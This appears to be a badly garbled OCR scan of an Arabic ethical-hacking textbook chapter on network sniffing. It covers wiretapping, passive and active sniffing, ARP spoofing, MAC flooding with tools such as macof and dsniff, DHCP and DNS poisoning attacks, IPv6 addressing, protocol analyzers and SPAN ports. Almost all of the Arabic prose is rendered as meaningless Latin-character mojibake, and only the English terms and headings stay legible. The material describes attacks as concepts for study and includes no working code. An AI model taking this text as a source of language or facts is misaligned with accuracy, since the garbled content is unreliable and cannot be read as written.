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^Jc £ JJ^ali JaLuiJ L_fl jjoi S^a. jll £>i& Uiajl .4_L^j£3l A lajuLjj 1 g ^1 iklLoii j Sniffing AjjuLujVI ^xl&lLJl Jjuj JjUli jjoj jll 

(jjLalj a ^ i^jLuiaSI djLuaiillj CjIj^VI l o ^ jjuj t^iUi AiLJaVU .Sniffing cf^* uj-^ u' ^S^It cJ j3 jud ^ f^-* ^ ^ 

.I^Iia^V cilli j wireshark ^bVl (jc J> ^ jJj jll J jUli l_a LJajl .siLill jjj-^ ^j^- 



Si^ j]| ^ L^Lj^LLa ^jj <_i j-uj die- jJa 




(Sniffing Concept) Sniffing Jl Jj* V-^-Vl ^li-il 8.1 



Wiretapping 

^ di3 jiiVl jl ^l^SI cjt^U^JI aA\ 4l±xjijl\ yt> ( 4,ffilgJ t cjU2Ha2I ("unnl t) Wiretapping or telephone tapping 
J (^Sc c qn^^l jl c v^nn^l ^j^i^ uJl ^j^j ^lilc ( . ia>j V j! < Wiretapping Cy* ^— ^ ^^A 3 lM* 

gjill SjjWI (l^ o^jVI c> jl ^1 jJI tSj^Vl) (listening device) g^UL-VI jl*^ J^>jj 4^ ^ 'Wiretap 

< (access)Jj^j^ * (intercept)^ ' (monitor)^ j^i ^ ^ *^5lJ ^ asLj^<A\ s jl^VI <> 

.diVl^ajVl ^Uaj ^ dULJt (Js^j ^ Sjjl jll CjLd jIslxJ! (record) Jj> * ^ j 

(Wiretapping Methods) <^aHJt jjla 
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;*UlUll Jjjlall J^Ia £)a £)) l^-aj 

The official tapping of telephone lines J^Jt J^- yr^J^ Su^uW 

The unofficial tapping of telephone lines c^jWyr^J c^iHH 

Recording the conversation ^1^*11 
Direct line wire tap s Jta* ^J^l Jc- Ci^iiill 

Radio wiretap < "i > ^n 



Wiretapping Jl £l jA 

< (access) J^jJI 4 (intercept)^^ ' (monitor)^^ UikJjj Jllj ^^11 Wiretapping c> u^j* 

.diVU^ajVl ^Uaj J CjULiJI (Js^j J s^jl jll CjL» jls^xJI (record) (Jj? ' ^ J 

Active Wiretapping i- 

^ j . (man-in-the -middle)^* jll J j ^>b Liajl l_a active wiretapping '^-^ dUlk^a J) JailW 

jl JJJiHI ^a^l ^-AuiJ ttilli Jl AiLjaVU ^Uaj J djUUJl jl JJJ-<Ji ^^P" (J*-^ cSjT* > uJ j AjSIjaJ till ^ajujJ 

Passive Wiretapping 

. (eavesdropping)^^! J (snooping) JalaSlI U-sjI ^j*j passive wiretapping dUlk^ J^L 

.l&Jc- ^ jl^j Jll cAiLiJ! Ai^stxJI l_jLoij£I jl jjj-<JI <aK Jc (snooping) 




Types of 
Wiretapping 



r 



1 1 



Active Wiretapping 

It monitors, records, alters and also injects 
something into the communication or traffic 



Passive Wiretapping 

It only monitors and records the traffic and 
gain knowledge of the data it contains 



( JJli (jiljjfct) Lawful Interception 

aj! j\ JjUMI jjUII 3 kLuJI <JjS ^ cjVL-ojVI djUUJI Jc; J jj^aJI Jl£j^l ^ Lawful interception (LI) 

^ajU^JIj (infrastructure management) ajI^I 4_mll s jtal Jia 3Ja^l J lJUII J s^iiia ^ ik&Vl c> ^ 
Uj jjis ajIc 4jSUj ^jjjLojVI J cjUUJI a<^A Jl J jj^a jll .(cyber-security-related issues) ULjaall j 

. law enforcement agencies (LEAS)uj^^^ CjVI^j c> CjUUxJI ^> ^j^l \^ ijiii 

jjP Jluu J^su Jll 4Jt j^ula2| CjI J12I £jj l^Jjbj ^jj Jll JjLuu jll J& ^jjxll f IjLV L££ Jal JpVI (> ^ Jll lib Jl A^U dllA 

,4 ftHa a ljUujV J Jli 

L— lAj L_S jjoj J jjUII (jialjJcVI ^ jill liA tillil LlujJJJ I^^J lS^*^ ^11*11 ^IaJI J 4_ijlA jVI <UaJdjVI dla^al ; JUdll cl^f^ Js- 

>L ^aljjc;VI ^^j^-V^ ^ ^ fJUll ^UJl J jI^LII /Lkj&Vt Jc^ jj*1I ^ILV U3 <jjau3U S^jli <j| 

.4_ifljlgJl djUJl^xJl Jc db gallll j& dfl jll J Jal I^cUjI ^aJ Jill (J Jail 
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lM tiA jj^jj .Decision Computer Group i> f ^ Telco/ISP J <^jASll <-M 
^ jj^ j^- (j-^H tap/access cAj^JI X^o\ jj&I ^1 cjUUJI *Uj sjIc-V tap/access 

j^JI *Uj s^lolj <4u ^ E-Detective (ED) J> j^j IP domain c> ^ j^V 1 

FTP j P2P 'SMTP <IMAP J POP3 ^Vj^iijjj ^ t> s^L^ ^ «4Ji -J^^ W ^ ^ 

.(Centralized Management Server) CMS c> U^j^j <4j ED i-J^l <Telnetj 



^ jaJt ^ I'unnl l Packet sniffing 

I Wiretapping . jjj*^ cASliA <%flaj L^j) (wiretapping) cjUJI£-<JI ^^ic Cl ^jls1\ <jl£ ^ ajI^JI CjI^jJj <J1* 
J£ Jalisll j ^ Packet sniffing .(<* jaJI c^oSSS) Packet sniffing i> <^ cA<^l ^ 

segment ^ ^ . jW (application) ^l^ki^U jjc jaj ^1 CjUUJI ^ 

<j! t ; nyil ^^kjjoaj (_^ilt j dujjjj cijtaUaj < u,^h»j ^43^ ^ sniffing ^ .segment 1^ u^WL)^ uj^ Ait£j 

^^ja^JI jj^>^ ^^>^ ^jj sniffing ^^^^ o^** .lsj^$\ CjUa^xJI ^^>^- ^jjj t aj^u^u jl^. ^ » ^ 



Ciijiij liAj cJlj U Packet sniffing o^j switch" Ua.j1jj£j (> v^ .. n ^ jJI j! ^> ^ jll ^ 

^H^(router) j(server) ^ a^j^J ^ cjUj^ ^ remote sniffing ■!> ^ jt 

^j^. ialiiill ^1"^ aj ^Packet sniffing ^l-^^nlj j <Jaij ^ l^L^U a^j^- J jll j <jal^JU till ^joij Igi! .5-1^ 

'SMB SQL database ^Telnet authentication <HTTP Basic 'IMAP 'POP <IMAP traffic 'POP 'SMTP 

^UJal ^ ^>JI t> I^LUjII ^jII cjUUJI ^1 ja J^k ^> cjU jlx^l ^> Jj»^ll .FTP traffic 'NFS 

.(active transmission) Jajuiill Jill I < . uL^j 4_uii3l ^ o^cLui^ ^ 4_JUi ji&l CjIa^a ^jiii dlj£ _a<^i 

1£)JlaAH* noil ^ l)^) OH ^^1^1 ^i^- ("unnlb ^i^l j oil ^bS Aoio£J ^JLJlj J/mMI jA LuS 




Switch 



Smith 



\ A copy of data 
: pas-sing through the 
.-' switch 



Lena 



Attacker 
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AjjL u'susi Ia^a .J 



(Sniffing A Sniffing Threats 



http://www.webopedia.com : ja^JI 
Jc <Xc* jjJl<J! a intViVl J I^qIa^LujI (j^j Sniff ers .d^^l jjc cjULjJI jLoj .jj^jj ^jIj jl/ j ^Ujj j& Sniffer 

,a£jjoi3I Jc *^ ja. diLa jIslxJI <3jjaj t(JH<Jl cJ^f^ tA^-jjjaua JJ*-II a It.* <Nf I lg_x»l,jjkjjail Liajl (j£-ajj ajbj 6 JllxJl J-iJjuj 

4_g_^.lj tg-Lo Sjj lalL&H ~ I^JLujJ L^liJ t4-uiLuill IgJalajll CjULiJl ^jijj J^ljVI J^JJ 4_g_^.!j ~ iklLujJ ^» j^Jl ^'"^ (j-a LjaaJ 

^I^C-Vl dlljLlk j-o ^J^xJl ^a^J j o^Axld dal £JJJ Ljajj ^ ^<<\1 $ jjj^Jl <£jJ*« (jC ^^jLuJI ^juj^)1I > ^^jj ^La ^^JjoiaII 

J 2^^(laptop) J a jj ^1 ^ *^lc .4 m ^ <jc ja (jAxia j^JI cjLg jix-o ^ jjuj ialaiill a £ Packet sniffer 
Jc Packet sniffer ^-^j l^^A 3 j-*^ ^AxJI (jjiijjjuJI iaU* u^*^ ^<^*u Jj j j]| l_l ^ j j £>i& 




^SniffingJl J-^uLjS 

LAN ^-LaLq jj jjj^ jl^j> lS^ . (Ethernet) ^j^] ^^j^I J jjj^^ ^ j^> jjSVI <LjIa3l 

aI^IujI ^jj .l^jaiij a£jJo3I AiUaj Jc Igijj^j ^jjj a£jJo3I J(node) <J^ lS^-^ MAC j& j -o^ 

ja j^VI j .fUail! Jjj (> CjUUJI Jul "frame" ^ (Ethernet protocol) Jj^jj^ jj MAC u' 
( Ethernet header ) ^ jk\ J ( Data Link Layer ) ^AjIjJI <^ j ^^Luj .Cjllnkill c> ^ .IP 
(mapping) c> <Jj>^i ^ (Network layer) a^JI aIjL . ipjl jj& <> V^? ^j31 MAC u'j^ 

^ <j| dii^ . (Data Link Protocol)^^^ ^* j d^jtjjt ^ <jj!^ ja MAC IP u^j^ 

j Jt ^n ju^i ^3 lili . ARP cache J j^Ji ^ ^ *^ j 4 J ^> j^^ MAC u^j^ u° 
IP J jjill jl jixJI c^ 1 j (ARP Request) ^> ^ (ARP Broadcast) ARP ^ ^ 6 IPu'j^ c> 

11a j (IP) *^ jj^aLJI 4%j> j ^^j'^l l£ (Jc- Broadcast ^ j^^. J^-^VI ^jjj 

^ Unicast ^ jll uj^ ^ lA 3 ARP Replay lS^ ^ ^ o-^ 1 ^ 1 MAC ^ u 1 ^j^J! ^ ^ 

J 6 j^axJl jW^^ .(J^ry^l L^jJaa J ^ Jj^al jill ^jljl^aJ! lAl3 <Lj]a3| ciljjj j^a-<Jl jlgjaJU ^j^aLiJl ARP Cache 

.liA MAC ^ f ^"'"J '^-^ J 3 ^ ? ^ t° <j*Vl^ajl 
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ljjjjj) ljLuj jH) (jjiA .CjUjJ) siA j£ J A hW\ * 4JLjiaj J-aau Sniffer ^ J 6 ^J-^j O- 4 (jt^uutuuj jl^ jj tilUA 

(Shared Ethernet) ^jli^l ^j^! *t 
tAliJI £>ja J .bandwidth <J^ u^ 1 * ^ g > j ^jiiaUjj j ^JalaJI ^jjaii Jc 3ilS -iajjjj tA£jiui<\31 lIujjjVI 4jjj J 

Jc^ Jjojjj -Uli <2 Jj Cjja^lb 1 <JVI JJJJ Ujjc < J^Lj .S^l j 5J!>U oil ^ jaJl Jjjj (Jj*?)t\ oj^Vl 

djjjj] J c£ J^-VI 6 J£J>VI ,4j <j-*alaJl jJj^axJl MAC ( ♦ 1 ^ > J 2 jW^^ (J-* 3 ^^ MAC ^^j^l 

. (Frame) j^V 1 J* 1 ^ ^ ^Ikij ^ lili .l^ij ^(frame) J Aj^j* 51 ^j 1 ' MACu* j^- ^ (4 3 ^t) 
CajjjjVI aId J Sniffing .(frames) J^Vl cfej s^lSIl ^ sniffer ^ lU^ ls^ £*j 
.hub sjj".. 1 -WL^ 6 ^ J .l^iLuuSI l-jxj gaj JUlLj 4 (l_a^JI 6jjujLix» (J>»Isijj V)passive <^-& 

Switched Ethernet *t 

J^ cSJ 1 ^ .Switched Ethernet cr^ 5 hub ^ i> Vjj <j£L>*!! Jj o^aJI l^a .Ljjjj Jll ^jV^ ajjj 

^jaJI ^aiaijj < MACu*j^ cs^ (Physical port) J*^ iaiall j < jjjjaaSII Sj^V MAC ajj^ ^ <y^N kfi^j 
6 oa _a£jjoJI Jc jj jjj^Sti 6 j^-^ ^j^t^ Ajjj V j Jaaa 4-$j> jll jj jjj^S Jj ci^j^ u^j^^ -U^*-* 

jj! jjsJI ^jja jll J NIC j ^^i^ 6 J^^j -cr^^^ c^ 0 ^ j ^-^^ bandwidth ^ '^liiaaVI (>ud^j 
^jc- lsUajj UUj cii^jj^a ) djlijj^ll jj^s u^^^ c> ^^"j V f j^JI (promiscuous mode) 

.Ujj^ ^ liA tcslli ^ j .sniffer 



j^Ut Jp l-uILuuVI ^hVi< nb (jL^-aII ^ 4 <>\n\\\ (jfe (sniffing) <**i«^^ti 'hub o-* lh^j^^ u- 4 ^ J^' J^ 

:Jl^t 

(ARP Spoofing) ARP Jl^t * 
jIjjc Jafla. ^jj jl^aJI c> ^ Jj^j ^ tj^ j^VI <jL^ J iajoijl ^ s uj^ ^ .stateless ARP 
J j^JI Jj ja. jll ^jj ^ j^l Sj^ ^ JL^jV! J JU J j3 ja. Arp Table Jj^ J ^ o 3 ^ 1 IP J) j MAC 

ARP Replay d^jW ^ ^ » mJJ j^a 4^ jaJ^ ^jjJa^Jl \±u IjA JJ jJJ^ll jW^ 1 13-^^ <jLaC Jj jj* ^^Ic ^ j 

jl£ j lis <j|jjc ip J! ^liJ! MAC u 1 *M ^f^ 31 J^ ^ ^ ^j^Vl (ARP Spoofing) jj> 

J) Aa.V JU jji3l (j\ JJ*J1 J^f*J j ARP -J! J J^ (Jj«^Jtjll UJ^ < — * ^ a^jjjli j Ail JJaJ -j) J-<JI j^aJl L_llia J^Lk ^ ^aJ ^ jjJa j-<Jl 

jl^a. Jj <jUila j AjUIjj JLujjU JjjJa^xJ! jl^aJl I^JJ I^A qaj lil a£j^3U o-^laJ! Gateway -Si uj^ ^ ^ J 31 j IP 

^IstJjai^ jjjjll Jj ^1 <jjjja II l^%a j Jj dAiljjj! b^£t> 4_ia. jj S.jIc.1 j& 4-1 (*J^ ^ cJ^ (jjJa^Jl Aja^U jJjjll j& 4-^^Sj (JjJa^xJl 

jjIxJI ciLaljjll <JS o^lji j o^aLuLq ^j-<i (jS-ojj l_a jjoj j ]VHT]VI Jj 6 <Jo^ J^^j 6 cJ^-^- ^-^-^ 

jl^aJ] jji3l ^jl jjxJl (jU obi UAt-d jj jjl! Jj ja^l jj j-d c . ilia cJ^J^ (J' c^ 41 ^ C3J^ j JJ jjll Jj (jjJa^xJl jl^aJl (j-a 

.<j ^-alaJl jl^aJl IP 1\ jA jjja^l 

MAC Flooding i- 

<j>jjj -L ^jjjjaJI Jc^ (Physical ports) iaUJI Jj MAC ^ ols^ ( l?^^ j^^ Jj^- J^ u^j^Ji 

laJLujj cJ*-?^ MAC Flooding o^j^^ lA^j ■^>^ , i JJ L * a j 1 u ^ W^!^ 'i 1 ^ 

V (jjJJJjJuJl ~y aJ Ja^ (^-aA jj Jl jjoiC (Jjjj^I Jc ^ ji^i jJl CjUliall L_flVl (J^J^ (j^O^ 3 U^J^^ J^V >JJ^I I^A 



< https://www.facebook.com/tibea2004 



615 



hub ^-^j L *° j 1 ^ ^ j ^— ^ failopen mode" ^£ cJ^-^j 4-^-3 'o^j^l Jl l^& ^— .^j^* 

clA^ V MAC Flooding .^j^? sniffing ^ clA^ <^ j .^^^xJ! Jc ialiall Jl ^pJI dii J^U. ^ 

. Jl£ Jji^ull ^Ikd <j^u3U Scapy ikJjj jl dsniff suite ^ J^ JJ> sbVl <macof ^1^1^ ls^jj Cj\ 

(Types of Sniffing Attacks) Sniffing ^Ua^ £t jj! 

jl <cjjjoui (Jj^j (jl Lftlj 6<£jjoJI Jc I^JLujjI ^jj Jll cAiUJ! Jc <J ^ai] a ikiLuajj 4<£jJa3l J j£ jjj^>j (JjI^j Jl j^Aj 'Sniffers 



c^UUJI s^IjS tdjLoj Sniffers 

^Viun A-ijij Sniffing .^1 < FTP^&JI j cjULJJI j j jjjSIVI ^jjJI j < J jj^WI J^jj lJ>^\\ J^Lsj j 

4_iLgc J ^ikla^Jl 4_ij£i3! Jc bLucI (JjlaJ l^j ^UaJl (j^J Sniffing ^ CjIa^A .4_i^Loj^l!l CjI£jJo3I £-^lj (J^j Jc- 

iSniffing ^1 jjVi Jj t^j ^1 jjl Jl < Vu^l cjU^JI jli ^Sniffing 




MAC Flooding - 

CjUUJ! jflis ^Jaii jllj CjUUJI ^ cAj\ > hjq j o^j^ lSj*^ J^j sniffing ^ ^jj MAC Flooding 

DNS Poisoning - 

.DNS j j^j^ i> C5^) cr^^ 4-A*xl\ ^ DNS Poisoning 

(3 ci^ (j^ < ^^ c ' Sjj-»J"^I ^ (j^ J ^V^^ ^—^3^^ 

ARP Poisoning 

a£ JLuj J ^ ^jauJal l IP jljjc ^ <j 4^UJI MAC ^W^^ ^ J ? ARP Poisoning 

.^VJl U IP aljk. jjjJI 

DHCP Attacks - 

j .CjU^SI (> jjo jj Jl DHCP ^ > ^J 

.CjUIIJI (> JLujjI (Jjja c> DHCP ajL^ ^ :DHCP starvation -1 

DHCP ^ J^"V rogue DHCP server ^1 ^l^ll ^ JiA J :Rogue DHCP server attack -2 

Jc J gaaJI (J^.1 (j>» a£jJJI DHCP ^^c- cijUlia <^Jl*-<J rogue server l!^*-^ ^aJ^JI a£jJo3I Jc ^jjJ^ 

^aLkSl JL^ajVI J jj^a j lU 3 *^ rogue server ci^ ^-^-a*^ ^^LJI CjUj jIscaII .a£jJo3I dibl^cl 

.DoS J ^ 
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Password Sniffing - 

cAiUJ! L-iauuj j (JaiuS ^jI! jj^>^ '^j^- cJ^^ l>* ^jL^IS a£jjuJ ^^uin ^jII ^^A 3 j& Password sniffing 

j ;4£jJa3l ^^ic D^laJjaJl (jj^^l g all 6 ( - ll ^^ic <J jj^^JI Asu . JJJ>JI jjQ ujj tilil jjjjoull <ila CjLlgjjI j^. a I iklLujj 

;<jujL II ^1 J-^lj 6^^Jjoia3I CjULoi^. ^Jl (J jj^a jll clA^ 

(Spoofing Attacks) JjIajII cjU*a 

ji^j g-MUj cCjUUJI jjjjj c> uj^ oj^W ^ yr^ gr* Spoofing attack 

^I^JjujI (jjlA^lg^all / Q ^ a . ^ ^l-l^Jl dil _4jj^a^juo3l dlLa jlstxJl Jj^)jaiJ jl o^iLd ^jl j>» ^1 (J jj^a jll L-buA^a 

j £fil j>» ^Laulj 44_JUl^.VI ^jjl&lVI ^O^l cJ^-^J J^jV 4^jUIjlu^. Jl J jj^ jll <C jjjuu* jjc. <L^)IaJ 4_i^jJa3! JP <j| jjc 
j 4_i^Luj^l!l <J jj^ jll Jallj <LgIsI (Jj^l g a\\ (j^J Lft j tL-Lud^Jl <Jj > <al 9J j JjuJI CjI JiLd <jujL CjLg jl*-* <J jj^^J] 

Types of Sniffing: Passive Sniffing 



l^j^slxJI 11a sniffer ^— ^ c^^l ^Uaill ^ V^j c^^JI J lail] <^ ^<JI ^j^JI Jalislt I g i£ sj c _^j3I cjU^jj sb! Sniffer 
a£^JI cjjI£ AiUaj .promiscuous mode < qj > ^^ l ^Uaill AiUaj lS^j^ Sniffer .promiscuous mode 
^^jj jl sniffing t^UlUj ,c5 ^W^' CP 6 Wj f -^^^ ^-^3 promiscuous t^j^^ 

.promiscuous £^ j^^ <i ^i^l l ^JaiJI ^£±^1 <^l j <alkj j (Jjjla sniffers c> ^ l_a^JI ^IkJI C5 I^ 
isniffing (> O^jj A ^ Jj^ 0* sniffing tii^ill ^jl^ ^ UUjp) 

Passive sniffing 
Active sniffing 

packet fl^U fij ^ * .ojj^^^ c> <^ ? jaJI ^1 j^j Ja&L Jaia >JI jl ^ ^ jJaij V Passive sniffing 
t*S jiUI ^LuojII jlkj .(common collision domain) ^iji^JI ^^1^31 jUaj ia^ Ja*j I^a ^j^S U^j sniffer 
fjL-fljll jUaj .(hub c> JLk-ajl) bridged jl switched uj^ V c?^^ a£j^3I ^iLa (common collision domain) 
^^Luj ^j3I a£j^JI ^^i^j Passive sniffing .hub ^j^j-* uj^ ^ s ^ (common collision domain) ^ji^ll 

Jaliiill lW^I ■ jjj - ^^ ^^>^ cJ^ ^jj ^^^1 (jg& yjf Q .y ^-ia^J j^-dj tcjl^jjaJI JiL<i ^ _i^i<Jaj| Jaj^)3 hub 

.Passive sniffing ^l^i^U hub ^ 
iPassive sniffing ii2 & <-i^ C^J^ oK 1 ^" lt* 



Attacker 



;Ai^L haII 4 hi It S nil (jfe Jj^a^U Ua S jj£i*il Passive sniffing < jj^ * c&j^ CP 
(5-JaiJI jjill j-fllauiVl c^j) cf^Ull c>VI (jl ji^l ^jWiun lil :Compromising the physical security 



2^ ^^JJ^ 3 (1 



.(sniffing) t *i > *Vnl t s j^a Cinj Aa jj^l ^Jax^ :Using a Trojan horse 



packet sniffer ^ ^ ^ j^ > ^ l Jl^ Jl jlkl ^ j^aj b aS1 jlkV <±auJa] | jl^ ^ 4j^aJI sniffing ^1 

.sniffing pl^j 
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qii ^^jouj^)]! (j^>i3l _^^£Lq jj jjj^ cjI^jjuj jl^a. (switch) (j^jjujli .hub u^o^l ^l^VunU ajj^JI CjI^jjuJI ^]\* a 

switch (J ls* 'line mapping j lA- l£ J) ^AjIjJI J^k Jfcj ^ jL hub (J ^switch j hub 

(Jjjj ^jiiljjjaJI t^UlUj jUa^ll m\a\\ cAjUJI J^jj j ttilli J^Lk ^ (Frame) j^-M cJ^ -Wo^l MAC Cft 

.active sniffing <Jko^ j& sniffing ^ JIjj V ^j^JI .passive sniffing 
.active sniffing (significant stealth advantages) jt^l y > passive sniffing :<Ua*5L 



Types of Sniffing: Active Sniffing 

^f^' jj^ c&j^ c> switched LAN J jjj^ ^ sniffing j^Ai Active sniffing 

V switched Ethernet 'Active sniffing -SI J c> sniffing J! Active sniffing .'M^ 

uj^j lA passive sniffing .hub is^ill ^ JUJI j* U£ LAN j lS^j ^ <*-^ CjUjkJI 

ajUlII L_u«j^a3l ^ j ^I^JI £>i& ^jc c ajuo£jl J^juJI Qjok -( j2jjjjjaJI Jc <Ajli3l a£jJo3I Jc djljUJI Jc (sniffing) ^^Yfll tj^S 

.sniffing c> ^ ^ 

(illilj ^AjjujlixJI jll tgiaj l>^j 'u^j^^ c)^ cl^ c — ^-^ j^j J v cl^j^ c ' u^^* ^jj Vjl 'Active sniffing J 

^content addressable memory (CAM) J ^ o- 3 ^ ARP cache -Maj ^j^JI . jjjJI a£ JalSjII j ^j^JI 
^Jajj CjU» jIslxJI 1^.L Sniffer L l} l ^ <J^3 cJ^^- cJ? 1 "> c^^^ SjSlill ^ ^j-alA ^ jj 11a j 

;s witch i_s^- A^jjuj C5 ic ^^>^ (j^alj^icV sniffing c)^ ^ ^ a 1 ^ ^ ^ CjLu^ill (j^asu ^^Jj Uua 
MAC flooding 
ARP spoofing 
DHCP starvation 
MAC duplicating 

Active sniffing -OiA^t (> ^j^it (*>^t ^1 J^j^ V Passive sniffing 'sniffing u a 1 ^^ 

(Protocols Vulnerable to Sniffing) c^ajull h^jp cjVj^jjx 

; jjoJI CjIaK ^^ic J jj^a^Jl diV j£ jJ jjJl i>i& ^^ic db^alill ^aJJ S^lc j .Sniffing CjV j£ jJ JjJl (^li 

^1 ciUi ^ Uj tl^Ll^ fjj U£ I^LISjII jSaj ^^kl^JI JjS ^> ^jjILJI cjUj^ ,sniffing :Telnet and rlogin 
4_JjUi ^^ic (real-time viewer) jJl ^ ^aUIxJI (jl I^a . - ^-^i ^aIjj iajjjalU Ia^Uj 

CjUK ^LuiVl aS^U^JI pHUi jJI ^Vit^ .CjI >j3I ^> ^jAxJI I^jJ HTTP c> cr^^ J^^^ jl^V^ :HTTP - 

c?a SNMP jj^l ^LJS JUj] ^ ^ .j^ ,>! -tpl ^jj V SNMPvl <j1 'SNMP a£j^ :SNMP - 

.4^1. nit JJ^ ^cjJal j (J-oj J djUUjll j JJJ^\ CjUK JLojjI iNNTP 
^jc. ^jJalj (j^aj dAiUillj JJJ-<Ji 1 - ^ ^ J^jj ^3 [POP 

CjUUJIj CjUK JLoijI :FTP - 
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(Tie to Data Link Layer in OSI Model) OSI £^ J cjULuII J^jj *Lk> LiSjj U 
* y± l£ . j*^ plj^t J) yr^ j ^VU^il ^Uaj l^pl OSI model (the Open Systems Interconnection model) 

>* jUaj l$J^ OSI 4hlal\ CjL^aJI Jjj j AjjlxJl AifSall diU^Jl ^pflj J AifSa j£ ciljL£5 j .(layer)^^ f^J ^J*^ 

tilaj CjULiJI ^ jjjiJjj/ j^jj ^jj tAifkll J . OSIj^ 4_ijU3l Aifkll (Data Link layer) ^—^-^ lS^ 3 ji AiJa 

.cjUUJI Jjj^s jj <LL ^ ^ j^JI ia£iL Sniff ers .Bits Jj ^ 
Jc-I J *^ j^. CjUi^kJIj cijllnJajli Jla ^c.| jilL ^jiili V l&jl . OSI^ ^-^W J Sniff ers 









CornprDmised 


Application Stream 








Application 








POP3 r IMAP P 
IM, SSL, SSH 

P njtocols/ Po rts 






Application 


Presentation 


Presentation 


Session 


Session 


Transport 


Transport 


mmmm 






IP Addr^i^s 






Network 














Network 


Data Link 






Initial Compromise 


Data Link 






Physical Links 




Physical 




Physical 













.CjI^I j3! clc j jll ^1 jll q\ jixll ciij 128 ^^lun (IPv6 address) o^HJI jl^^y! cLujjjVI (Jj^jj jjijS^ 

'.^j i> IPv6 J^Vl ojj^ 

jll Jl l^uLu ^aii unicast i> u'j^ J' W^j' ^ <u>Jl .s^lj <^>jl ^j~> j^j :Unicast 

l^ul^j <jla Any cast i> u'j^ ^ <^>JI .cjI^IjII <> jx^J lJ*j*^ Jj jjAj : Any cast 

. (routing protocol)^ j^t Jj^jjj .uL^ Iao^ ^1 l_j jSVl i^ljil Jt 

(4j ^ Multicast c> utj^ Jt U^^j^ ^ cs^' ^>JI .cjI^IjII ^> jx^J lJj*^ Jl jjAj Multicast 

ji*Jl lA^Aa. jll ^ixt^J 1^-xuL uJ 

j^(site-local) '(link-local)(J^ uj^ unicast 'ojj^I j^Vl ci 1 *^ 

Any cast ^j*^ & ' J^Wj .unicast c> Any cast ojj^ ^ s ^ .(global)^^ 

.Anycast u'j^ u^s c?^^ unicast c> u'j^ 
- (Broadcast messages)^ J^^j ^ ^Vmn V IPv6 jt^V) 



< https://www.facebook.com/tibea2004 



619 



Li n k-Loc a I 



| FESO 


OOOO 


OOOO OOOO 


KXJtX XKXX XX XX XXMX | 




lObits 




54-bits 


64 bits 




Prefix 




Zeroes 


Interface Identifier 








Unique-Local (ULA) 










1 Fcoa 










38-biTs 




64 bits 


Prefix 




Subnet id 


Interface Identifier 



Global 





2000 




GGGG 


GGGG 


| «s 




3-bit5 


13-bits 


8- bits 


24-bits 


16-bits 




Prefi* 


TLA ID 


RES 




NLA ID 


SLA ID 


Interface Identifier 












IV! u 1 1 i c , 


a st Addresses 








XKXX 


HXWC 


HXXK 


KXXK | HKKX | XXHX | XXVX £ 


s-bits 


4-b6tS 


4-blts 




Prefix 


Flags 


Scope 


Interface Identifier 



IPv4 Header 



IPv6 Header 





Field's name kept from IPv4 to IPv& 
Fields not kept in IPv6 



Name and position changed in IPv6 
New field in IPv6 



(Hardware Protocol Analyzers) JjSj^jj^I S 

4_^jjjui Jjiisu qj^ CjIjLujVI JatfljlV IjojIjojI ^AaJLujJ j ,a£jjoJI JjJ-aJl ^^>^ JJJ^ J Jua ^ g <J J^>^ cSj^* ^3^' 

AIAaH CjU^ (jc 4_^jU3I <JJ±kjj a£jjoJI JJ^ ^^>^ J ^j/Ml ^l.^l ml <JSl^<J ^Lal^Viml . JjJ-<Ji ^^>^ 

Agilent N2X N5540A i- 

.s jfa.Vl j cjU^kJI sj^aiift d^itnll pi J ji^jll t*ll ^joij ^jll j iaUJI jUikl flkj Agilent N2X N5540A 



< https://www.facebook.com/tibea2004 




Agilent E2960B + 

<xl6 link widths c> XI ^ Jj£ jjjjj lU^ j ^13^ j jUik^U ^^ki^j sbi ^ Agilent E2960B 




RADCOM Prism UltraLite Protocol Analyzer * 

> j W j& troubleshoot j ^13 RADCOM Prism UltraLite Protocol Analyzer 
JjSjjjjj > j 'Prism UltraLitej LAN/WAN/ATM cAS^S J JjSjjjjj JL^ y> ^ill <PrismLite t> 

oj Jl^ll 11a J ikUj .CjV j£ jjjjJI <xjujIj <^ j*->* j^-^V fiNU ^^klaij .WAN/Fast LAN r '^y : ^ 

.TCP/IP ^ c> ^ 




FLUKE Networks OptiView® Network Analyzer *k 

^ JL^jIj J£ tSj^Vl c> * l£ ^ FLUKE Networks OptiView® Network Analyzer 

djl^j^ill ^ 4£jJo3I AjLl^. (jc !>Liaa 4£jJo3! J^nlaj] e-hVl J^- 4 ^* <J^J J CjIj^VI . JL^aliVl 
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FLUKE Networks Etherscope tm Series II Network Assistant «t 



^cLuj .wireless LAN 802.11 j Gigabit LAN Jl*- J» Fluke ES2 Etherscope Network Assistant 

^ o^cLoixi ^ jjill C5 ic LAN 




RADCOM PrismLite Protocol Analyzer <4 

^1 jj^ll j lSJ^ j ^ij3 tdl ^uo£i sbt j& Jj CjSj ^ATM j 'LAN 'WAN jW 1 ^ PrismLite fj* > ^ ^ 

_a£jj^3I j t^l laijl jj^ A£fxi3l djU^k ^^Ic JaU^JI til^Laij Igil .LAN/WAN 
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SPAN Port 



j* j ' [Switched Port Analysis] SPAN port mirroring j^uo^ cAZ JjS L^i <ul& jlkj j SPAN 
u!^ 6 port mirroring u^-^ f^. LqaIc- ^^j/MI ^^ic Igj ^-^^a^ J jj^a jll ^jWill j ^HxkVl j > ^ill j 

jn^^i iflU^ _(jjiijjjuJ! ^^Ic iaaa j jl ^ild tilLiA (Jj^j (jl i5*-f^ o^j 6 j-*^ j v <^1U& (Jj^j q\ .a£jjuJI JI^g 

^fl IDS < : \fi f U^J 2 yr^ Cljl^^j^il Ay Ah jSS .„(>5SI ^llfi. t aKo <jj J AjjouIU 4J Attkjll L-JJatJt £ jjll li* IxjL 

(JjAj tl^Jc Sniff j >*\l 5-^1^3 l^j^jJj 
SPAN ^ffi gUjkg* ^jUjt J juu 
Source Port -1 

Transmitted (Tx) jl received (Rx) o^j^JI y-i <*>JI J±lL^ ^ill cjjjJI y> j monitored port 

^ J VLAN multiple SPAN sessions ^ 
j' Physical Port ji Routed Port c> u^j cjUjjj^JI ^> SPAN Source Port uj^ ^ 

.Etherchannel Port J Trunk Port J Access Port J Physical Switch Port 

VLAN Filtering -2 

VLAN f N ^^" <<< Ujli li^Jj o^j^JI ^ VLAN cJ^ Uj^al jjs) AJli Trunk Port -J , ^ a j ^ ^•^c 

voice J trunk ports VLAN Filter ^^i^l 'Trunk Port J ^ ^^^i Filtering 

VLAN ports 

VLAN ID ja Ua source interface uj^j VLAN J* ^ > VSPAN iSource VLAN 

source VLAN uj%^ ' j destination port * jf^j ^jjj ^ 

Destination Port -3 

